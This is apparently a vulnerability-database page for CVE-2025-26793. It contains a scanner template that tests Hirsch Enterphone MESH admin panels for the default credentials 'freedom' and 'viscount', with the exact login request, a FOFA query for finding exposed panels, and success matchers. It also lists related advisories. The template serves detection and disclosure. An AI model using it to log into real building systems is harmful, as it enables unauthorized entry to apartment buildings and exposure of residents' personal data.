| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-26793 | 15 Feb 202514:55 | – | circl | |
| Hirsch Enterphone MESH 安全漏洞 | 15 Feb 202500:00 | – | cnnvd | |
| CVE-2025-26793 | 15 Feb 202500:00 | – | cve | |
| CVE-2025-26793 | 15 Feb 202500:00 | – | cvelist | |
| EUVD-2025-4246 | 15 Feb 202500:00 | – | euvd | |
| CVE-2025-26793 | 15 Feb 202515:15 | – | nvd | |
| CVE-2025-26793 | 17 Feb 202500:25 | – | redhatcve | |
| ⚡ THN Weekly Recap: Google Secrets Stolen, Windows Hack, New Crypto Scams and More | 17 Feb 202509:19 | – | thn | |
| VulnCheck KEV: CVE-2025-26793 | 8 Jun 202500:00 | – | vulncheck_kev | |
| CVE-2025-26793 | 15 Feb 202500:00 | – | vulnrichment |
id: CVE-2025-26793
info:
name: FREEDOM Administration - Default Login
author: Eric Daigle,DhiyaneshDK
severity: critical
description: |
The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the "vulnerable systems are not following manufacturers' recommendations to change the default password."
impact: |
Attackers can gain unauthorized access to building management systems using default credentials, potentially exposing residents' personally identifiable information and controlling access to apartment buildings.
remediation: |
Change default credentials immediately to strong, unique passwords as recommended in the manufacturer's security guidelines.
reference:
- https://www.ericdaigle.ca/posts/breaking-into-dozens-of-apartments-in-five-minutes/
- https://news.ycombinator.com/item?id=43160884
- https://support.identiv.com/products/physical-access/hirsch/
classification:
epss-score: 0.02303
epss-percentile: 0.8131
metadata:
verified: true
max-request: 1
fofa-query: title="FREEDOM Administration"
tags: cve,cve2025,freedom,admin,mesh,vkev,vuln
variables:
username: "freedom"
password: "viscount"
http:
- raw:
- |
POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formLoginName={{username}}&formLoginPassword={{password}}
redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Administration: Controlled Areas"
- "Log Out"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f6e976c549a541a8a4bb9ec39e67564246fc5d1fee1d7fc10111eb6f8eab91a602202804cd8ce0c27c103a78e24ec1860aa522398ad8735b48ec0694a560c5ba1949:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation